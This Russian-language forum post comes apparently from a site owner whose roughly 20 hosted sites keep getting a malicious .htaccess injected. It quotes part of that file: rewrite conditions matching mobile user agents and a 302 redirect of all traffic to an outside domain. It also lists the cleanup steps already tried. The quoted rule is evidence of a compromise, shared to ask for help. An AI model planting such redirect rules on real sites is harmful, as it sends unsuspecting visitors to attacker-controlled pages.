Добрый день. У меня следующая проблема.

На всех сайтах моего хостера (все сайты на одном аккаунте их около 20) регулярно подменяется .htaccess на вредоносный, такого вида.

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]

… тут еще много всего перечислено…

RewriteRule ^(.*)$ httpupd.com/s/4087 [L,R=302]

Притом это не зависит от движка сайта (Joomla, Wordpress или голый HTML), меняется даже там где всего лишь один единственный index.html

Обратился к хостеру, посоветовали поменять пароли и закрыть доступ по ftp

Предпринимаемые действия: изменил пароль на ftp, изменил пароль входа в админ панель хостера, изменил пароль для доступа к MySQL. Ситуация не поменялась. Вообще полностью закрыл доступ к ftp, проблема не исчезла. Менял права на .htaccess, всем дольно на чтение, не помогло.

Просматривал скрипты на наличие iframe, левых ява скриптов, все чисто. Подскажите, какие еще действия можно предпринять?

Заранее спасибо.